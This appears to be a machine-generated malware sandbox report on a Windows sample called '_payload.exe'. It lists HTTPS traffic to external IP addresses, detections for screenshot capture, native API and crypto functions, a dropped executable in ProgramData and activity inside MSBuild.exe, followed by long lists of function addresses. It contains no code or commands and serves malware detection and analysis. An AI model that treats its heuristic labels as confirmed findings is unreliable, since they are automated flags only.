Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 104.102.49.249:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 168.119.176.241:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.249:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 168.119.176.241:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 168.119.176.241:443 -> 192.168.2.4:49773 version: TLS 1.2

Contains functionality to record screenshots

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

6_2_00411530

Contains functionality to call native functions

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2BED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	0_2_6C2BED10
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2FB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C2FB700
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2FB8C0 rand_s,NtQueryVirtualMemory,	0_2_6C2FB8C0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2FB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C2FB910
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C29F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C29F280

Detected potential crypto function

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003EBD50	0_2_003EBD50
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003EA130	0_2_003EA130
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003E9B30	0_2_003E9B30
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003E9B58	0_2_003E9B58
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2935A0	0_2_6C2935A0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C30542B	0_2_6C30542B
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C30AC00	0_2_6C30AC00
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2D5C10	0_2_6C2D5C10
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2E2C10	0_2_6C2E2C10
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2A5440	0_2_6C2A5440
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C30545C	0_2_6C30545C
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2F34A0	0_2_6C2F34A0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2FC4A0	0_2_6C2FC4A0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2A6C80	0_2_6C2A6C80
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C29D4E0	0_2_6C29D4E0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2D6CF0	0_2_6C2D6CF0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2A64C0	0_2_6C2A64C0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2BD4D0	0_2_6C2BD4D0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2AFD00	0_2_6C2AFD00
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2BED10	0_2_6C2BED10
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2C0512	0_2_6C2C0512
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2F85F0	0_2_6C2F85F0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2D0DD0	0_2_6C2D0DD0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2F9E30	0_2_6C2F9E30
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2E5600	0_2_6C2E5600
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2D7E10	0_2_6C2D7E10
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C306E63	0_2_6C306E63
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C29C670	0_2_6C29C670
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2E2E4E	0_2_6C2E2E4E
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2B4640	0_2_6C2B4640
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2B9E50	0_2_6C2B9E50
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2D3E50	0_2_6C2D3E50
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2F4EA0	0_2_6C2F4EA0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2FE680	0_2_6C2FE680
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2B5E90	0_2_6C2B5E90
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C3076E3	0_2_6C3076E3
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C29BEF0	0_2_6C29BEF0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2AFEF0	0_2_6C2AFEF0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2A9F00	0_2_6C2A9F00
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2D7710	0_2_6C2D7710
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2E77A0	0_2_6C2E77A0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C29DFE0	0_2_6C29DFE0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2C6FF0	0_2_6C2C6FF0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2DB820	0_2_6C2DB820
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2E4820	0_2_6C2E4820
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2A7810	0_2_6C2A7810
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2DF070	0_2_6C2DF070
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2B8850	0_2_6C2B8850
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2BD850	0_2_6C2BD850
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2C60A0	0_2_6C2C60A0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2BC0E0	0_2_6C2BC0E0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2D58E0	0_2_6C2D58E0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C3050C7	0_2_6C3050C7
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C30B170	0_2_6C30B170
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2AD960	0_2_6C2AD960
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2EB970	0_2_6C2EB970
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2BA940	0_2_6C2BA940
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C29C9A0	0_2_6C29C9A0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2CD9B0	0_2_6C2CD9B0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2D5190	0_2_6C2D5190
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2F2990	0_2_6C2F2990
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2D9A60	0_2_6C2D9A60
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C302AB0	0_2_6C302AB0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2922A0	0_2_6C2922A0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2C4AA0	0_2_6C2C4AA0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2ACAB0	0_2_6C2ACAB0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C30BA90	0_2_6C30BA90
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2B1AF0	0_2_6C2B1AF0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2DE2F0	0_2_6C2DE2F0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2D8AC0	0_2_6C2D8AC0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2DD320	0_2_6C2DD320
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2AC370	0_2_6C2AC370
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C295340	0_2_6C295340
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C29F380	0_2_6C29F380
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C3053C8	0_2_6C3053C8
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C406C00	0_2_6C406C00
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C34AC60	0_2_6C34AC60
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C41AC30	0_2_6C41AC30
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C39ECD0	0_2_6C39ECD0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C33ECC0	0_2_6C33ECC0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C46AD50	0_2_6C46AD50
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C40ED70	0_2_6C40ED70
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C4C8D20	0_2_6C4C8D20
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C344DB0	0_2_6C344DB0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C4CCDC0	0_2_6C4CCDC0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C3D6D90	0_2_6C3D6D90
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C3DEE70	0_2_6C3DEE70
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C420E20	0_2_6C420E20
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C3C6E90	0_2_6C3C6E90
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C34AEC0	0_2_6C34AEC0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C3E0EC0	0_2_6C3E0EC0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C346F10	0_2_6C346F10
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C402F70	0_2_6C402F70
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C480F20	0_2_6C480F20
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C3AEF40	0_2_6C3AEF40
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C34EFB0	0_2_6C34EFB0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C41EFF0	0_2_6C41EFF0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C340FE0	0_2_6C340FE0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C488FB0	0_2_6C488FB0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C414840	0_2_6C414840
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C390820	0_2_6C390820
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C3CA820	0_2_6C3CA820
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_014BE118	4_2_014BE118
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_014BEE80	4_2_014BEE80
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_014B3BC1	4_2_014B3BC1
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_014B3C28	4_2_014B3C28
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_014B3E71	4_2_014B3E71
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_014B3E80	4_2_014B3E80
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054B4948	4_2_054B4948
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054B2106	4_2_054B2106
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054B7D20	4_2_054B7D20
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054B9470	4_2_054B9470
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054BBC91	4_2_054BBC91
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054B9EC8	4_2_054B9EC8
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054BCD50	4_2_054BCD50
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054BCD60	4_2_054BCD60
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054B7D10	4_2_054B7D10
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054B4939	4_2_054B4939
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054B2C38	4_2_054B2C38
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054B5C88	4_2_054B5C88
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054BA758	4_2_054BA758
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054BB230	4_2_054BB230
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054B9EB7	4_2_054B9EB7
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_05A61B10	4_2_05A61B10
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_05A63036	4_2_05A63036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0041BD50	6_2_0041BD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0041A130	6_2_0041A130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00419B58	6_2_00419B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00419B30	6_2_00419B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE24CF0	6_2_1FE24CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE112A8	6_2_1FE112A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF79CC0	6_2_1FF79CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE1292D	6_2_1FE1292D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF39A20	6_2_1FF39A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FEC5940	6_2_1FEC5940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE11C9E	6_2_1FE11C9E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE13E3B	6_2_1FE13E3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FECD6D0	6_2_1FECD6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FEB9690	6_2_1FEB9690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF79430	6_2_1FF79430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FEA53B0	6_2_1FEA53B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FFED209	6_2_1FFED209
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF35040	6_2_1FF35040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE29000	6_2_1FE29000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE38D2A	6_2_1FE38D2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF14A60	6_2_1FF14A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE11EF1	6_2_1FE11EF1
